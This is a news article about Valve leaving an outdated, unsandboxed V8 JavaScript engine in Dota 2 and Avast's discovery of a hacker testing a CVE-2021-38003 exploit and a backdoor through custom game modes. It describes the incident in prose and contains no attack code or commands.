Valve left a security hole in Dota 2 for two years until someone tried to exploit it

In the context: Released in 2013, Dota 2 is still one of the most popular multiplayer games among MOBA fans. And within 15 months, millions of Dota 2 players were potentially vulnerable to remote code execution attacks due to Valve’s inattention.

Valve is notorious for spending time making a new Half-Life game (any new game, really) or counting up to three. The digital distribution giant co-founded by Gabe Newell appears to be just as casual about dangerous security vulnerabilities, putting players of one of its most popular games at risk and allowing hackers to go crazy with their malicious experiments.

The free-to-play MOBA Dota 2 is still extremely popular, despite being originally released nearly 10 years ago on July 9, 2013. Like many other games, Dota 2 includes a build of the V8 JavaScript engine created by Google for the Chrome/Chromium Project. The fundamental problem here is that, until recently, Valve was still using an outdated build of the V8 engine built in December 2018.

The version, which is over four years old, has been riddled with potentially dangerous security bugs. To make matters worse, Dota 2 does not use V8 with any kind of sandbox protection. An attacker could use the issue to remotely launch malicious code against Dota players. According to Avast, this is what It happened before Valve finally upgraded the V8 engine.

Avast researchers discovered that an unknown hacker was testing a potential exploit against CVE-2021-38003, an extremely dangerous V8 engine security vulnerability with a severity rating of 8.8/10. At first, the hacker performed a seemingly harmless test by publishing a new custom game mode – a way for players to change the gaming experience – with embedded exploit code for CVE-2021-38003.

After that, the hacker published three more game modes, using a more stealthy approach, using a simple backdoor consisting of only “about twenty lines of code.” The backdoor could execute arbitrary JS scripts downloaded from the C&C server via the HTTP protocol. The clever trick allowed the attacker to hide the exploit code and easily update it without submitting a new custom game mode for inspection and possible detection. In other words, this would allow a hacker to dynamically execute JavaScript code (and likely the CVE-2021-38003 exploit) in the background.

Google fixed CVE-2021-38003 in October 2021. Meanwhile, an unknown hacker began experimenting in March 2022. The developers of Dota 2 didn’t bother to fix the issue until January 2023, when Avast informed them of their findings. Further analysis to look for other exploits was unsuccessful, and the true motives of the Dota 2 hacker remain unknown.